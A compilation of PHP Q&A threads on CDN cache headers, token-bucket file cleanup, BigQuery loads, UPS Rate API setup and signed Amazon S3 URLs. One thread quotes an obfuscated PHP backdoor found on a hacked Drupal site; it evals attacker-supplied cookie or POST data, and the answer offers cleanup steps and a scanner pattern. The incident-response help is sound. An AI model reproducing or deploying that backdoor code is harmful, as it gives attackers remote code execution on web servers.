How to set Cache-Control for external cloud files - PHP

Hey Guys,
I was bent on improving my page speed factors, and yesterday I got some cloud space on Rackspace Cloud. Before this, I was serving static content from a cookieless domain with proper cache control through .htaccess.
Now that I have moved to the cloud, my .htaccess does not control the cloud files. There is a TTL parameter on Rackspace that sets how long files should stay on the CDN, and that value is reflected in my Page Speed results (Google + Firebug). The default setting can be a maximum of 72 hours, but I need something above 7 days. I would need some API for that, and it's kinda complex...
Is there any way I can enforce cache control on my cloud files?
What do these query strings do: domain.com/file.css?cache=0.54454334?
Do they achieve what I am looking for?
Any help is appreciated.

You may have figured it out already, but here's a link to check out: Set far-future expires headers with Rackspace Cloud Files (sort of).
He is using the cloudfiles PHP API, and so am I. You can manually set the TTL (aka expires) headers to whatever you want. Right now I have mine set to 365 days (maybe a little excessive).
The documentation is fairly straightforward. If you need any help, this code should help you get started:
<?php
// include the API
require('cloudfiles.php');
// cloud info
$username = "myusername"; // username
$key = "c2dfa30bf91f345cf01cb26d8d5ea821"; // api key
// Connect to Rackspace
$auth = new CF_Authentication($username, $key);
$auth->authenticate();
$conn = new CF_Connection($auth);
// Get the container we want to use
$container = $conn->create_container('images');
// local file to upload (also used as the object name)
$filename = "images/logo.jpg";
// upload file to Rackspace
$object = $container->create_object($filename);
$object->load_from_filename($filename);
// make public, and set headers
$container->make_public(86400 * 365); // expires headers set to 365 days
?>
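As for the ?cache=0.54454334 query strings you asked about: they don't set any cache headers by themselves. They are cache busters: browsers and CDNs key their caches on the full URL, so changing the query string forces a fresh download. A random value like that actually works against caching; the more useful variant (a sketch, with a hypothetical file path) keys the query string to the file's modification time, so you can combine far-future expires headers with instant updates:
<?php
// emit a stylesheet link whose query string changes only when the
// file itself changes, forcing clients to re-fetch after an update
$cssPath = 'css/style.css';     // hypothetical local path
$version = filemtime($cssPath); // changes whenever the file is edited
echo '<link rel="stylesheet" href="/' . $cssPath . '?v=' . $version . '">';
?>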

Related

Drupal 7 Recent log messages

I am facing an issue. Every day, .ico files and a .php file with this kind of code appear on my server:
$zvtizrs = 'y6v1i4be#torufpkxc7_8Hg0n*-2sladm\'';
$yjzgov = Array();
$yjzgov[] = $zvtizrs[30].$zvtizrs[3].$zvtizrs[30].$zvtizrs[27].$zvtizrs[1].$zvtizrs[23].$zvtizrs[30].$zvtizrs[13].$zvtizrs[26].$zvtizrs[6].$zvtizrs[20].$zvtizrs[31].$zvtizrs[30].$zvtizrs[26].$zvtizrs[5].$zvtizrs[3].$zvtizrs[27].$zvtizrs[18].$zvtizrs[26].$zvtizrs[20].$zvtizrs[3].$zvtizrs[13].$zvtizrs[27].$zvtizrs[26].$zvtizrs[1].$zvtizrs[23].$zvtizrs[5].$zvtizrs[13].$zvtizrs[5].$zvtizrs[13].$zvtizrs[23].$zvtizrs[20].$zvtizrs[30].$zvtizrs[18].$zvtizrs[17].$zvtizrs[7];
$yjzgov[] = $zvtizrs[21].$zvtizrs[25];
$yjzgov[] = $zvtizrs[8];
$yjzgov[] = $zvtizrs[17].$zvtizrs[10].$zvtizrs[12].$zvtizrs[24].$zvtizrs[9];
$yjzgov[] = $zvtizrs[28].$zvtizrs[9].$zvtizrs[11].$zvtizrs[19].$zvtizrs[11].$zvtizrs[7].$zvtizrs[14].$zvtizrs[7].$zvtizrs[30].$zvtizrs[9];
$yjzgov[] = $zvtizrs[7].$zvtizrs[16].$zvtizrs[14].$zvtizrs[29].$zvtizrs[10].$zvtizrs[31].$zvtizrs[7];
$yjzgov[] = $zvtizrs[28].$zvtizrs[12].$zvtizrs[6].$zvtizrs[28].$zvtizrs[9].$zvtizrs[11];
$yjzgov[] = $zvtizrs[30].$zvtizrs[11].$zvtizrs[11].$zvtizrs[30].$zvtizrs[0].$zvtizrs[19].$zvtizrs[32].$zvtizrs[7].$zvtizrs[11].$zvtizrs[22].$zvtizrs[7];
$yjzgov[] = $zvtizrs[28].$zvtizrs[9].$zvtizrs[11].$zvtizrs[29].$zvtizrs[7].$zvtizrs[24];
$yjzgov[] = $zvtizrs[14].$zvtizrs[30].$zvtizrs[17].$zvtizrs[15];
foreach ($yjzgov[7]($_COOKIE, $_POST) as $xtfjdc => $jqlwt) {
    function frtdmz($yjzgov, $xtfjdc, $omljrbn) { return $yjzgov[6]($yjzgov[4]($xtfjdc . $yjzgov[0], ($omljrbn / $yjzgov8) + 1), 0, $omljrbn); }
    function htylm($yjzgov, $xwoin) { return #$yjzgov[9]($yjzgov[1], $xwoin); }
    function twdine($yjzgov, $xwoin) { $sknbn = $yjzgov3 % 3; if (!$sknbn) { eval($xwoin1); exit(); } }
    $jqlwt = htylm($yjzgov, $jqlwt);
    twdine($yjzgov, $yjzgov[5]($yjzgov[2], $jqlwt ^ frtdmz($yjzgov, $xtfjdc, $yjzgov8)));
}
Could you please tell me what I should do?
I am using Rackspace hosting. Also, I have a lot of links like this one (/d0E0MDY5VDNpanR6NDM5MzFJaQ==) in the recent log.
How can I stop that?
Thanks in advance!
Hacked. I was recently cleaning a hacked site myself and it was a nightmare. Best would be to restore a recent version from backup and immediately apply all security updates. If there is no backup (big problem!) you can try "cleaning" the site as I did:
1. Clean all the files with malicious content. Go search/replace through all the files (see the sketch after this list).
2. Dump the database and do the same thing to the dump file: remove malicious content, then import it back.
3. Check the user accounts. If there are suspicious ones, block/delete them.
4. Check for newly created suspicious user groups. Delete them too.
5. Make a backup.
6. Apply all security updates/patches. Make a fresh backup again.
7. Change all account passwords (Drupal admins, FTP accounts, database accounts).
8. Set up scheduled backups, e.g. using the Backup & Migrate module.
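For the search part of step 1, a rough sketch like this can help locate infected files (the patterns are common red flags in injected PHP, not a complete list, and the docroot path is a placeholder; legitimate code also uses these functions, so review every hit by hand):
<?php
// recursively scan a docroot for constructs that often appear in
// injected PHP malware; print candidates for manual review
$suspicious = '/\b(eval|base64_decode|gzinflate|str_rot13)\s*\(/i';
$it = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator('/var/www/html') // adjust to your docroot
);
foreach ($it as $file) {
    if ($file->isFile() && $file->getExtension() === 'php') {
        if (preg_match($suspicious, file_get_contents($file->getPathname()))) {
            echo $file->getPathname(), PHP_EOL;
        }
    }
}
?>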

Best advice on clearing buckets using a Token Bucket rate limiting mechanism

I am using the 'Bandwidth Throttle' library to throttle API requests, essentially to prevent someone at the same IP from making tons of requests within a set timeframe. This creates a bucket (simply a file) that is stored within the buckets directory.
As this will build up considerably over time, what process does everyone use for this? Would you recommend purging this folder after x amount of time, and if so, what timeframe would be suggested? (See the cleanup sketch after the code below.)
use bandwidthThrottle\tokenBucket\Rate;
use bandwidthThrottle\tokenBucket\TokenBucket;
use bandwidthThrottle\tokenBucket\storage\FileStorage;

$ip = $_SERVER['REMOTE_ADDR'];
$storage = new FileStorage(__DIR__ . "/buckets/$ip.bucket"); // this will build up quickly
$rate = new Rate(10, Rate::SECOND);
$bucket = new TokenBucket(10, $rate, $storage);
$bucket->bootstrap(10);

if (!$bucket->consume(1, $seconds)) {
    http_response_code(429);
    header(sprintf("Retry-After: %d", floor($seconds)));
    exit();
}
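One common approach (a sketch, not something the library ships) is a scheduled cleanup job that deletes bucket files that have not been touched recently. A bucket file that has been idle longer than it takes the bucket to refill just represents a full bucket, and the library recreates the file on the next request, so removing it is safe:
<?php
// run from cron, e.g. hourly: purge bucket files idle for an hour
$dir = __DIR__ . '/buckets';
$maxAge = 3600; // seconds of inactivity before a bucket file is purged
foreach (glob($dir . '/*.bucket') as $file) {
    if (filemtime($file) < time() - $maxAge) {
        @unlink($file); // @ in case a request re-opens it concurrently
    }
}
?>
How aggressive to be depends on your rate: with a 10 tokens/second bucket, any file idle for more than a second or two is already full again, so even a short purge window is harmless.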

Google BigQuery PHP Load Data from URL

I am connecting to an API and getting a report in TSV format. I need to upload the report to Google BigQuery, but all the documentation I have found so far loads data from Google Cloud Storage. Is there a way to load data from a separate URL?
Here is the code I have thus far:
$service = new Google_BigqueryService($client);
// Your project number, from the developers.google.com/console project you created
// when signing up for BigQuery
$project_number = '*******';
// Information about the destination table
$destination_table = new Google_TableReference();
$destination_table->setProjectId($project_number);
$destination_table->setDatasetId('php_test');
$destination_table->setTableId('my_new_table');
// Information about the schema for your new table
$schema_fields = array();
$schema_fields[0] = new Google_TableFieldSchema();
$schema_fields[0]->setName('Date');
$schema_fields[0]->setType('string');
$schema_fields[1] = new Google_TableFieldSchema();
$schema_fields[1]->setName('PartnerId');
$schema_fields[1]->setType('string');
....
$destination_table_schema = new Google_TableSchema();
$destination_table_schema->setFields($schema_fields);
// Set the load configuration, including source file(s) and schema
$load_configuration = new Google_JobConfigurationLoad();
$load_configuration->setSourceUris(array('EXTERNAL URL WITH TSV'));
$load_configuration->setDestinationTable($destination_table);
$load_configuration->setSchema($destination_table_schema);
$job_configuration = new Google_JobConfiguration();
$job_configuration->setLoad($load_configuration);
$load_job = new Google_Job();
$load_job->setKind('load');
$load_job->setConfiguration($job_configuration);
$jobs = $service->jobs;
$response = $jobs->insert($project_number, $load_job);
I realize that this is meant for Google Cloud Storage, but I do not want to use it if I am just going to pass data through it and delete it within the hour.
Is there PHP code that I can use that will allow me to use external URLs and load data from them?
As Pentiuum10 mentioned above, BigQuery doesn't support reading from non-Google Cloud Storage URLs. The logistics involved would be tricky ... we'd need credentials to access the data, which we don't really want to have to be responsible for. If this is a popular request, we might end up supporting external paths that are either unrestricted or support oauth2. That said, we haven't had a lot of users asking for this so far.
Feel free to file a feature request via the public issue tracker here: https://code.google.com/p/google-bigquery/issues/.
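In the meantime, one workaround is to fetch the TSV yourself and hand the bytes to BigQuery directly: jobs.insert can also accept the data inline as a media upload, so no Cloud Storage staging is needed. A sketch against the same legacy client as the question; treat the exact option names ('data', 'mimeType', 'uploadType') as assumptions to verify against your client version:
// fetch the report from the external URL ourselves
$tsv_data = file_get_contents('EXTERNAL URL WITH TSV');
// tell the load config it is tab-separated, and drop setSourceUris()
$load_configuration->setSourceFormat('CSV');
$load_configuration->setFieldDelimiter("\t");
// pass the bytes inline as a multipart media upload
$response = $jobs->insert($project_number, $load_job, array(
    'data' => $tsv_data,
    'mimeType' => 'application/octet-stream',
    'uploadType' => 'multipart',
));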

UPS API including correct WSDL file and endpoint

I am new to using WSDLs. I have used REST before, but not this. I am trying to run the sample code file that is included on the UPS developer site; page 23 of this guide covers the API I am using. The download includes about ten guides, which I have perused, but initially I just want to figure out how to fill out the top configuration part below (I am using the PHP example code file SoapRateClient.php). What do I put for the WSDL? What do I put for the endpoint URL? The download from their site has several WSDL files and I'm not sure which one I am supposed to choose. Guidance appreciated.
<?php
// Configuration
$access = "secret"; // I have this, no problem
$userid = ""; // I have this as well
$passwd = ""; // I have this
$wsdl = " Add Wsdl File Here "; // What the heck do I put here!?
$operation = "ProcessRate";
$endpointurl = ' Add URL Here'; // Also, what do I put here?
$outputFileName = "XOLTResult.xml";
For anyone else out there confused about how to get started with the UPS Rate API: I implemented Jonathan Kelly's UPS Rate API class. You just fill in your account number, key, username, and password, and play with the other variables. I was able to return a dollar amount for ground shipping in five minutes. Thank goodness I didn't have to mess with SOAP and web services.
Here are the details of the top parameters for SoapRateClient.php (a wiring sketch follows this list):
1. $access = "xxxx";
This is provided by UPS. You have to create a UPS developer account for it (different from a regular online account on the website): go to https://www.ups.com/upsdeveloperkit and click on "Step 5: Request an access key."
2. $userid = "xxx";
The user ID of the account.
3. $passwd = "xxx";
The password of the account.
4. $wsdl = "wsdl/RateWS.wsdl";
This is the WSDL file you need to include for SoapRateClient.php. Change the path accordingly.
5. $operation = "ProcessRate";
The operation to perform.
6. $endpointurl = 'https://wwwcie.ups.com/webservices/Rate';
The UPS test (CIE) endpoint for the Rate service.
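To see how those parameters fit together: SoapRateClient.php essentially builds a PHP SoapClient from the local WSDL and then points it at the endpoint. A stripped-down sketch of that wiring (plain SoapClient calls; the real sample does more, such as attaching the UPS security header before calling ProcessRate):
<?php
$wsdl = "wsdl/RateWS.wsdl"; // WSDL file shipped in the UPS developer kit
$endpointurl = 'https://wwwcie.ups.com/webservices/Rate'; // test (CIE) endpoint
$client = new SoapClient($wsdl, array(
    'soap_version' => SOAP_1_1,
    'trace' => 1, // keep raw request/response around for debugging
));
// override whatever address is baked into the WSDL with the real endpoint
$client->__setLocation($endpointurl);
// $response = $client->__soapCall('ProcessRate', array($request), null, $header);
?>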
I wish you the best of luck. When I started down this path, I ended up grabbing code from several commerce products written in PHP to see how they did it, as I could not get the UPS examples to work. It turns out most of them just do a POST and manually assemble the XML instead of using SOAP, since SOAP is so painful.
But regardless, what it wants in $wsdl is the WSDL file location.
The endpoint URL is the UPS URL for the service you wish to use; for example, for TimeInTransit:
For prod: https://wwwcie.ups.com/ups.app/xml/TimeInTransit
For test: https://onlinetools.ups.com/ups.app/xml/TimeInTransit
EDIT: It appears that the URLs above are reversed. Reference: https://developerkitcommunity.ups.com/index.php/Special:AWCforum/st/id267
"Once your testing is completed please direct your Shipping Package XML to the Production URL: https://onlinetools.ups.com/webservices/Ship"
They should read:
For test: https://wwwcie.ups.com/ups.app/xml/TimeInTransit
For prod: https://onlinetools.ups.com/ups.app/xml/TimeInTransit

Securely serving files from Amazon S3

I have an app that uploads user files to S3. At the moment, the ACL for the folders and files is set to private.
I have created a db table (called docs) that stores the following info:
id
user_id
file_name (original file as specified by the user)
hash_name (random hash used to save the file on amazon)
So, when a user wants to download a file, I first check in the db table that they have access to the file. I'd prefer not to have the file downloaded to my server first and then sent to the user; I'd like them to be able to grab the file directly from Amazon.
Is it OK to rely on a very, very long hash name (making it basically impossible for anyone to randomly guess a filename)? In that case, I can set the ACL for each file to public-read.
Or, are there other options that I can use to serve the files whilst keeping them private?
Remember, once the link is out there, nothing prevents a user from sharing that link with others. Then again, nothing prevents the user from saving the file elsewhere and sharing a link to the copy of the file.
The best approach depends on your specific needs.
Option 1 - Time Limited Download URL
If applicable to your scenario, you can create expiring (time-limited) links to the S3 content. That allows the user to download the content for a limited amount of time, after which they must obtain a new link.
http://docs.amazonwebservices.com/AmazonS3/latest/dev/S3_QSAuth.html
Option 2 - Obfuscated URL
If you value avoiding running the file through your web server over the risk that a URL, however obscure, might be intentionally shared, then use the hard-to-guess link name. This would allow a link to remain valid "forever", which means the link can be shared "forever".
Option 3 - Download through your server
If you are concerned about the link being shared and definitely want users to authenticate through your website, then serve the content through your website after verifying user credentials.
This option also allows the link to remain valid "forever", but it requires the user to log in (or perhaps just have an authentication cookie in the browser) to access it.
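For what option 3 looks like in practice, here is a bare-bones sketch. It assumes a session-based login, a lookup against the asker's docs table (elided), and the get_public_url() helper from the answer below; $hash_name and $file_name stand in for that table's columns:
<?php
session_start();
if (empty($_SESSION['user_id'])) {
    http_response_code(403);
    exit('Forbidden');
}
// ... look up the requested row in docs and verify its user_id
// matches $_SESSION['user_id'], populating $hash_name / $file_name ...
$url = get_public_url($keyID, $s3Key, $aws_bucket, $hash_name, '+1 minute');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . $file_name . '"');
readfile($url); // streams S3 -> your server -> user; needs allow_url_fopen
?>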
I just want to post the PHP solution with code, in case anybody has the same problem.
Here's the code I used:
$aws_access_key_id = 'AKIAIOSFODNN7EXAMPLE';
$aws_secret_key = 'YourSecretKey12345';
$aws_bucket = 'bucket';
$file_path = 'directory/image.jpg';
$timeout = '+10 minutes';
// get the URL!
$url = get_public_url($aws_access_key_id, $aws_secret_key, $aws_bucket, $file_path, $timeout);
// print the URL!
echo($url);

function get_public_url($keyID, $s3Key, $bucket, $filepath, $timeout)
{
    $expires = strtotime($timeout);
    // sign with the function's own parameters, not the globals above
    $stringToSign = "GET\n\n\n{$expires}\n/{$bucket}/{$filepath}";
    $signature = urlencode(hex2b64(hmacsha1($s3Key, utf8_encode($stringToSign))));
    $url = "https://{$bucket}.s3.amazonaws.com/{$filepath}?AWSAccessKeyId={$keyID}&Signature={$signature}&Expires={$expires}";
    return $url;
}
// standard HMAC-SHA1 implementation (hash_hmac() would also work)
function hmacsha1($key, $data)
{
    $blocksize = 64;
    $hashfunc = 'sha1';
    if (strlen($key) > $blocksize) {
        $key = pack('H*', $hashfunc($key));
    }
    $key = str_pad($key, $blocksize, chr(0x00));
    $ipad = str_repeat(chr(0x36), $blocksize);
    $opad = str_repeat(chr(0x5c), $blocksize);
    $hmac = pack('H*', $hashfunc(($key ^ $opad) . pack('H*', $hashfunc(($key ^ $ipad) . $data))));
    return bin2hex($hmac);
}

// convert a hex string to base64
function hex2b64($str)
{
    $raw = '';
    for ($i = 0; $i < strlen($str); $i += 2) {
        $raw .= chr(hexdec(substr($str, $i, 2)));
    }
    return base64_encode($raw);
}
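For what it's worth, if you are on the official AWS SDK for PHP (v3), it can generate these pre-signed URLs for you, which avoids hand-rolling the signature and signs with Signature Version 4 (required by newer regions). A sketch with the same bucket, key, and timeout as above:
<?php
require 'vendor/autoload.php';

use Aws\S3\S3Client;

$s3 = new S3Client([
    'version' => 'latest',
    'region'  => 'us-east-1', // adjust to your bucket's region
]);
$cmd = $s3->getCommand('GetObject', [
    'Bucket' => 'bucket',
    'Key'    => 'directory/image.jpg',
]);
$request = $s3->createPresignedRequest($cmd, '+10 minutes');
echo (string) $request->getUri();
?>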
